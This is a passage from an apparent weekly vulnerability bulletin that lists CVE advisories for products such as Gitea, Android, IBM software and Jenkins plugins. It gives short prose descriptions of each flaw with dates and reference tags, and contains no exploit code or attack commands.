  The avatar middleware in Gitea before 1.13.6 allows Directory Traversal via a crafted URL. 2022-03-15 not yet calculated CVE-2021-29134
MISC
MISC glewlwyd — sso_server
  scheme/webauthn.c in Glewlwyd SSO server 2.x before 2.6.2 has a buffer overflow associated with a webauthn assertion. 2022-03-18 not yet calculated CVE-2022-27240
MISC
MISC go-ethereum — go-ethereum
  Go-Ethereum v1.10.9 was discovered to contain an issue which allows attackers to cause a denial of service (DoS) via sending an excessive amount of messages to a node. This is caused by missing memory in the component /ethash/algorithm.go. 2022-03-17 not yet calculated CVE-2021-42219
MISC golang — go
  golang.org/x/crypto/ssh before 0.0.0-20220314234659-1baeb1ce4c0b in Go through 1.16.15 and 1.17.x through 1.17.8 allows an attacker to crash a server in certain circumstances involving AddHostKey. 2022-03-18 not yet calculated CVE-2022-27191
CONFIRM
MISC google — android In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-204585345References: N/A 2022-03-16 not yet calculated CVE-2021-39722
MISC google — android In usb_gadget_giveback_request of core.c, there is a possible use after free out of bounds read due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-161010552References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39792
MISC google — android Product: AndroidVersions: Android kernelAndroid ID: A-209014813References: N/A 2022-03-16 not yet calculated CVE-2021-39723
MISC google — android Product: AndroidVersions: Android kernelAndroid ID: A-208229524References: N/A 2022-03-16 not yet calculated CVE-2021-39737
MISC google — android In TuningProviderBase::GetTuningTreeSet of tuning_provider_base.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205753190References: N/A 2022-03-16 not yet calculated CVE-2021-39724
MISC google — android In gasket_free_coherent_memory_all of gasket_page_table.c, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-151454974References: N/A 2022-03-16 not yet calculated CVE-2021-39725
MISC google — android In cd_ParseMsg of cd_codec.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-181782896References: N/A 2022-03-16 not yet calculated CVE-2021-39726
MISC google — android In copy_io_entries of lwis_ioctl.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205992503References: N/A 2022-03-16 not yet calculated CVE-2021-39732
MISC google — android In eicPresentationRetrieveEntryValue of acropora/app/identity/libeic/EicPresentation.c, there is a possible information disclosure due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-196388042References: N/A 2022-03-16 not yet calculated CVE-2021-39727
MISC google — android In prepare_io_entry and prepare_response of lwis_ioctl.c and lwis_periodic_io.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205995773References: N/A 2022-03-16 not yet calculated CVE-2021-39736
MISC google — android In amcs_cdev_unlocked_ioctl of audiometrics.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-206128522References: N/A 2022-03-16 not yet calculated CVE-2021-39733
MISC google — android In sendMessage of OneToOneChatImpl.java (? TBD), there is a possible way to send an RCS message without permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-208650395References: N/A 2022-03-16 not yet calculated CVE-2021-39734
MISC google — android In the TitanM chip, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-202006191References: N/A 2022-03-16 not yet calculated CVE-2021-39729
MISC google — android In kbase_jd_user_buf_pin_pages of mali_kbase_mem.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210470189References: N/A 2022-03-16 not yet calculated CVE-2021-39793
MISC google — android In TBD of TBD, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-206472503References: N/A 2022-03-16 not yet calculated CVE-2021-39730
MISC google — android In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205036834References: N/A 2022-03-16 not yet calculated CVE-2021-39731
MISC google — android In gasket_alloc_coherent_memory of gasket_page_table.c, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-151455484References: N/A 2022-03-16 not yet calculated CVE-2021-39735
MISC google — android Product: AndroidVersions: Android kernelAndroid ID: A-206977562References: N/A 2022-03-16 not yet calculated CVE-2021-39716
MISC google — android In onCreate of RequestManageCredentials.java, there is a possible way for a third party app to install certificates without user approval due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-205150380 2022-03-16 not yet calculated CVE-2021-39702
MISC google — android In multiple functions of odsign_main.cpp, there is a possible way to persist system attack due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-206090748 2022-03-16 not yet calculated CVE-2021-39689
MISC google — android In various setup methods of the USB gadget subsystem, there is a possible out of bounds write due to an incorrect flag check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210292376References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39685
MISC google — android In setDisplayPadding of WallpaperManagerService.java, there is a possible way to cause a persistent DoS due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-204316511 2022-03-16 not yet calculated CVE-2021-39690
MISC google — android In onCreate of SetupLayoutActivity.java, there is a possible way to setup a work profile bypassing user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209611539 2022-03-16 not yet calculated CVE-2021-39692
MISC google — android In onUidStateChanged of AppOpsService.java, there is a possible way to access location without a visible indicator due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-208662370 2022-03-16 not yet calculated CVE-2021-39693
MISC google — android In ih264d_parse_decode_slice of ih264d_parse_slice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-205702093 2022-03-16 not yet calculated CVE-2021-39667
MISC google — android In parse of RoleParser.java, there is a possible way for default apps to get permissions explicitly denied by the user due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-202312327 2022-03-16 not yet calculated CVE-2021-39694
MISC google — android In createOrUpdate of BasePermission.java, there is a possible permission bypass due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-209607944 2022-03-16 not yet calculated CVE-2021-39695
MISC google — android In checkFileUriDestination of DownloadProvider.java, there is a possible way to bypass external storage private directories protection due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-200813547 2022-03-16 not yet calculated CVE-2021-39697
MISC google — android In aio_poll_complete_work of aio.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-185125206References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39698
MISC google — android In serviceConnection of ControlsProviderLifecycleManager.kt, there is a possible way to keep service running in foreground without notification or permission due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-212286849 2022-03-16 not yet calculated CVE-2021-39701
MISC google — android In TBD of TBD, there is a possible out of bounds write due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-195726151References: N/A 2022-03-16 not yet calculated CVE-2021-39721
MISC google — android In updateState of UsbDeviceManager.java, there is a possible unauthorized access of files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-207057578 2022-03-16 not yet calculated CVE-2021-39703
MISC google — android In deleteNotificationChannelGroup of NotificationManagerService.java, there is a possible way to run foreground service without user notification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209965481 2022-03-16 not yet calculated CVE-2021-39704
MISC google — android In getNotificationTag of LegacyVoicemailNotifier.java, there is a possible leak of ICCID due to a permissions bypass. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-186026746 2022-03-16 not yet calculated CVE-2021-39705
MISC google — android In onResume of CredentialStorage.java, there is a possible way to cleanup content of credentials storage due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-200164168 2022-03-16 not yet calculated CVE-2021-39706
MISC google — android In onReceive of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-200688991 2022-03-16 not yet calculated CVE-2021-39707
MISC google — android In __show_regs of process.c, there is a possible leak of kernel memory and addresses due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-178379135References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39715
MISC google — android Product: AndroidVersions: Android kernelAndroid ID: A-207433926References: N/A 2022-03-16 not yet calculated CVE-2021-39720
MISC google — android In lwis_top_register_io of lwis_device_top.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205995178References: N/A 2022-03-16 not yet calculated CVE-2021-39719
MISC google — android In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205035540References: N/A 2022-03-16 not yet calculated CVE-2021-39718
MISC google — android In gatt_process_notification of gatt_cl.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-206128341 2022-03-16 not yet calculated CVE-2021-39708
MISC google — android In iaxxx_btp_write_words of iaxxx-btp.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-198653629References: N/A 2022-03-16 not yet calculated CVE-2021-39717
MISC google — android In ion_buffer_kmap_get of ion.c, there is a possible use-after-free due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205573273References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39714
MISC google — android Product: AndroidVersions: Android kernelAndroid ID: A-173788806References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39713
MISC google — android In TBD of TBD, there is a possible user after free vulnerability due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-176918884References: N/A 2022-03-16 not yet calculated CVE-2021-39712
MISC google — android In bpf_prog_test_run_skb of test_run.c, there is a possible out of bounds read due to Incorrect Size Value. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-154175781References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39711
MISC google — android Product: AndroidVersions: Android kernelAndroid ID: A-202160245References: N/A 2022-03-16 not yet calculated CVE-2021-39710
MISC google — android In sendSipAccountsRemovedNotification of SipAccountRegistry.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-208817618 2022-03-16 not yet calculated CVE-2021-39709
MISC google — android In several functions of binder.c, there is a possible way to represent the wrong domain to SELinux due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-200688826References: Upstream kernel 2022-03-16 not yet calculated CVE-2021-39686
MISC google — android
  In Package Manger, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-67862680 2022-03-16 not yet calculated CVE-2021-39624
MISC google — android
  In NotificationStackScrollLayout of NotificationStackScrollLayout.java, there is a possible way to bypass Factory Reset Protections. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-193149550 2022-03-16 not yet calculated CVE-2021-0957
MISC google — sa360-webquery-bigquery
  A local attacker could read files from some other users’ SA360 reports stored in the /tmp folder during staging process before the files are loaded in BigQuery. We recommend upgrading to version 1.0.3 or above. 2022-03-18 not yet calculated CVE-2021-22571
CONFIRM
CONFIRM gpac — gpac GPAC 1.0.1 is affected by a heap-based buffer overflow in SFS_AddString () at bifs/script_dec.c. 2022-03-14 not yet calculated CVE-2022-24578
MISC gpac — gpac
  GPAC 1.0.1 is affected by a NULL pointer dereference in gf_utf8_wcslen (). 2022-03-14 not yet calculated CVE-2022-24577
MISC gradio — gradio
  `gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer’s computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user’s computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs. 2022-03-17 not yet calculated CVE-2022-24770
CONFIRM
MISC
MISC gradle_enterprise — gradle_enterprise Gradle Enterprise before 2021.4.3 relies on cleartext data transmission in some situations. It uses Keycloak for identity management services. During the sign-in process, Keycloak sets browser cookies that effectively provide remember-me functionality. For backwards compatibility with older Safari versions, Keycloak sets a duplicate of the cookie without the Secure attribute, which allows the cookie to be sent when accessing the location that cookie is set for via HTTP. This creates the potential for an attacker (with the ability to impersonate the Gradle Enterprise host) to capture the login session of a user by having them click an http:// link to the server, despite the real server requiring HTTPS. 2022-03-16 not yet calculated CVE-2022-27225
MISC gradle_enterprise — gradle_enterprise
  In Gradle Enterprise before 2021.4.2, the default built-in build cache configuration allowed anonymous write access. If this was not manually changed, a malicious actor with network access to the build cache could potentially populate it with manipulated entries that execute malicious code as part of a build. As of 2021.4.2, the built-in build cache is inaccessible-by-default, requiring explicit configuration of its access-control settings before it can be used. (Remote build cache nodes are unaffected as they are inaccessible-by-default.) 2022-03-17 not yet calculated CVE-2022-25364
MISC
MISC hestiacp — hestiacp
  Reflected Cross-site Scripting (XSS) Vulnerability in GitHub repository hestiacp/hestiacp prior to 1.5.11. 2022-03-16 not yet calculated CVE-2022-0986
MISC
CONFIRM hms — hms HMS v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in department.php. 2022-03-15 not yet calculated CVE-2022-25490
MISC hms — hms HMS v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in appointment.php. 2022-03-15 not yet calculated CVE-2022-25491
MISC hms — hms HMS v1.0 was discovered to contain a SQL injection vulnerability via the medicineid parameter in ajaxmedicine.php. 2022-03-15 not yet calculated CVE-2022-25492
MISC hms — hms
  HMS v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via treatmentrecord.php. 2022-03-15 not yet calculated CVE-2022-25493
MISC htmldoc — htmldoc A flaw was found in htmldoc before v1.9.12. Heap buffer overflow in pspdf_prepare_outpages(), in ps-pdf.cxx may lead to execute arbitrary code and denial of service. 2022-03-16 not yet calculated CVE-2021-23165
MISC
MISC
MISC
MISC htmldoc — htmldoc
  A flaw was found in htmldoc in v1.9.12. Double-free in function pspdf_export(),in ps-pdf.cxx may result in a write-what-where condition, allowing an attacker to execute arbitrary code and denial of service. 2022-03-16 not yet calculated CVE-2021-23158
MISC
MISC
MISC httpie — httpie
  Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository httpie/httpie prior to 3.1.0. 2022-03-15 not yet calculated CVE-2022-0430
MISC
CONFIRM ibm — big_sql_and_cloud_pak_for_data
  IBM Big SQL on IBM Cloud Pak for Data 7.1.0, 7.1.1, 7.2.0, and 7.2.3 could allow an authenticated user with appropriate permissions to obtain sensitive information by bypassing data masking rules using a CREATE TABLE SELECT statement. IBM X-Force ID: 220480. 2022-03-14 not yet calculated CVE-2022-22353
CONFIRM
XF ibm — business_automation_workflow
  IBM Business Automation Workflow 18.0, 19.0, 20.0, and 21.0 and IBM Business Process Manager 8.5 and 8.6 stores user credentials in plain clear text which can be read by a lprivileged user. IBM X-Force ID: 214346. 2022-03-18 not yet calculated CVE-2021-39046
XF
CONFIRM ibm — data_virtualization
  IBM Data Virtualization on Cloud Pak for Data 1.3.0, 1.4.1, 1.5.0, 1.7.1 and 1.7.3 could allow an authorized user to bypass data masking rules and obtain sensitve information. IBM X-Force ID: 212620. 2022-03-14 not yet calculated CVE-2021-38971
XF
CONFIRM ibm — engineering_requirements_quality_assistant
  IBM Engineering Requirements Quality Assistant prior to 3.1.3 could allow an authenticated user to cause a denial of service. IBM X-Force ID: 207413. 2022-03-18 not yet calculated CVE-2021-29899
CONFIRM
XF ibm — engineering_workflow_management
  IBM Engineering Workflow Management 7.0, 7.0.1, and 7.0.2 and IBM Rational Team Concert 6.0.6 and 6.0.0.1 could allow an authenticated user to obtain sensitive information about build definitions. IBM X-Force ID: 192707. 2022-03-15 not yet calculated CVE-2020-4989
CONFIRM
XF ibm — spectrum_copy_data_management IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 214534. 2022-03-14 not yet calculated CVE-2021-39055
CONFIRM
XF ibm — spectrum_copy_data_management
  IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 220038 2022-03-14 not yet calculated CVE-2022-22344
CONFIRM
XF ibm — spectrum_copy_data_management
  IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to server-side request forgery, caused by improper input of application server registration function. A remote attacker could exploit this vulnerability using the host address and port fields of the application server registration form in the portal UI to enumerate and attack services that are running on those hosts. IBM X-Force ID: 214441. 2022-03-14 not yet calculated CVE-2021-39051
CONFIRM
XF ibm — spectrum_protect_operations_center
  IBM Spectrum Protect Operations Center 8.1.0.000 through 8.1.13.xxx is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 220048. 2022-03-14 not yet calculated CVE-2022-22346
CONFIRM
XF ibm — spectrum_protect_operations_centers
  IBM Spectrum Protect Operations Center 8.1.0.000 through 8.1.13.xxx is vulnerable to reverse tabnabbing where it could allow a page linked to from within Operations Center to rewrite it. An administrator could enter a link to a malicious URL that another administrator could then click. Once clicked, that malicious URL could then rewrite the original page with a phishing page. IBM X-Force ID: 220139. 2022-03-14 not yet calculated CVE-2022-22348
CONFIRM
XF ibm — spectrum_protect_plus
  IBM Spectrum Protect Plus 10.1.0.0 through 10.1.9.2 and IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 do not limit the length of a connection which could allow for a Slowloris HTTP denial of service attack to take place. This can cause the Admin Console to become unresponsive. IBM X-Force ID: 220485. 2022-03-14 not yet calculated CVE-2022-22354
CONFIRM
CONFIRM
XF in_pluck — in_pluck
  In Pluck 4.7.16, an admin user can use the theme upload functionality at /admin.php?action=themeinstall to perform remote code execution. 2022-03-18 not yet calculated CVE-2022-26965
MISC
MISC irz — mobile_routers
  A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor’s defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router’s default credentials aren’t rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction. 2022-03-19 not yet calculated CVE-2022-27226
MISC
MISC
MISC jenkins — cloudbees_aws_credentials
  A missing permission check in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token. 2022-03-15 not yet calculated CVE-2022-27199
CONFIRM
MLIST jenkins — cloudbees_aws_credentials
  A cross-site request forgery (CSRF) vulnerability in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token. 2022-03-15 not yet calculated CVE-2022-27198
CONFIRM
MLIST jenkins — dashboard_view
  Jenkins Dashboard View Plugin 2.18 and earlier does not perform URL validation for the Iframe Portlet’s Iframe source URL, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure views. 2022-03-15 not yet calculated CVE-2022-27197
CONFIRM
MLIST jenkins — dbcharts
  Jenkins dbCharts Plugin 0.5.2 and earlier stores JDBC connection passwords unencrypted in its global configuration file on the Jenkins controller where they can be viewed by users with access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27216
CONFIRM
MLIST jenkins — environment_dashboard
  Jenkins Environment Dashboard Plugin 1.1.10 and earlier does not escape the Environment order and the Component order configuration values in its views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with View/Configure permission. 2022-03-15 not yet calculated CVE-2022-27213
CONFIRM
MLIST jenkins — extended_choice Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Item/Configure permission to read values from arbitrary JSON and Java properties files on the Jenkins controller. 2022-03-15 not yet calculated CVE-2022-27203
CONFIRM
MLIST jenkins — extended_choice Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier does not escape the value and description of extended choice parameters of radio buttons or check boxes type, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. 2022-03-15 not yet calculated CVE-2022-27202
CONFIRM
MLIST jenkins — extended_choice
  A cross-site request forgery vulnerability in Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers to connect to an attacker-specified URL. 2022-03-15 not yet calculated CVE-2022-27204
CONFIRM
MLIST jenkins — extended_choice
  A missing permission check in Jenkins Extended Choice Parameter Plugin 346.vd87693c5a_86c and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL. 2022-03-15 not yet calculated CVE-2022-27205
CONFIRM
MLIST jenkins — favorite
  Jenkins Favorite Plugin 2.4.0 and earlier does not escape the names of jobs in the favorite column, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure or Item/Create permissions. 2022-03-15 not yet calculated CVE-2022-27196
CONFIRM
MLIST jenkins — folder-based_authorization_strategy
  Jenkins Folder-based Authorization Strategy Plugin 1.3 and earlier does not escape the names of roles shown on the configuration form, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission. 2022-03-15 not yet calculated CVE-2022-27200
CONFIRM
MLIST jenkins — git_branches_parameter
  Jenkins List Git Branches Parameter Plugin 0.0.9 and earlier does not escape the name of the ‘List Git branches (and more)’ parameter, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission. 2022-03-15 not yet calculated CVE-2022-27212
CONFIRM
MLIST jenkins — gitlab_authentication
  Jenkins GitLab Authentication Plugin 1.13 and earlier stores the GitLab client secret unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27206
CONFIRM
MLIST jenkins — global-build-stats
  Jenkins global-build-stats Plugin 1.5 and earlier does not escape multiple fields in the chart configuration on the ‘Global Build Stats’ page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission. 2022-03-15 not yet calculated CVE-2022-27207
CONFIRM
MLIST jenkins — incapptic_connect_uploader
  Jenkins incapptic connect uploader Plugin 1.15 and earlier stores tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27218
CONFIRM
MLIST jenkins — kubernetes_continuous_deploy Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows users with Credentials/Create permission to read arbitrary files on the Jenkins controller. 2022-03-15 not yet calculated CVE-2022-27208
CONFIRM
MLIST jenkins — kubernetes_continuous_deploy
  A missing/An incorrect permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2022-03-15 not yet calculated CVE-2022-27211
CONFIRM
MLIST jenkins — kubernetes_continuous_deploy
  A cross-site request forgery (CSRF) vulnerability in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. 2022-03-15 not yet calculated CVE-2022-27210
CONFIRM
MLIST jenkins — kubernetes_continuous_deploy
  A missing permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. 2022-03-15 not yet calculated CVE-2022-27209
CONFIRM
MLIST jenkins — parameterized_trigger
  Jenkins Parameterized Trigger Plugin 2.43 and earlier captures environment variables passed to builds triggered using Jenkins Parameterized Trigger Plugin, including password parameter values, in their `build.xml` files. These values are stored unencrypted and can be viewed by users with access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27195
CONFIRM
MLIST jenkins — release_helper
  A cross-site request forgery (CSRF) vulnerability in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials. 2022-03-15 not yet calculated CVE-2022-27214
CONFIRM
MLIST jenkins — release_helper
  A missing permission check in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials. 2022-03-15 not yet calculated CVE-2022-27215
CONFIRM
MLIST jenkins — semantic_versioning
  Jenkins Semantic Versioning Plugin 1.13 and earlier does not restrict execution of an controller/agent message to agents, and implements no limitations about the file path that can be parsed, allowing attackers able to control agent processes to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery. 2022-03-15 not yet calculated CVE-2022-27201
CONFIRM
MLIST jenkins — vmware_vrealize_codestream
  Jenkins Vmware vRealize CodeStream Plugin 1.2 and earlier stores passwords unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system. 2022-03-15 not yet calculated CVE-2022-27217
CONFIRM
MLIST kingsoft — internet_security_9_plus
  The kernel mode driver kwatch3 of KINGSOFT Internet Security 9 Plus Version 2010.06.23.247 fails to properly handle crafted inputs, leading to stack-based buffer overflow. 2022-03-17 not yet calculated CVE-2022-25949
JVN
CONFIRM kunze_law — kunze_law
  The Kunze Law WordPress plugin before 2.1 does not escape its ‘E-Mail Error “From” Address’ settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 not yet calculated CVE-2022-0674
MISC libnested — libnested
  The package libnested before 1.5.2 are vulnerable to Prototype Pollution via the set function in index.js. **Note:** This vulnerability derives from an incomplete fix for [CVE-2020-28283](https://security.snyk.io/vuln/SNYK-JS-LIBNESTED-1054930) 2022-03-17 not yet calculated CVE-2022-25352
MISC
MISC
MISC libvcs — libvcs
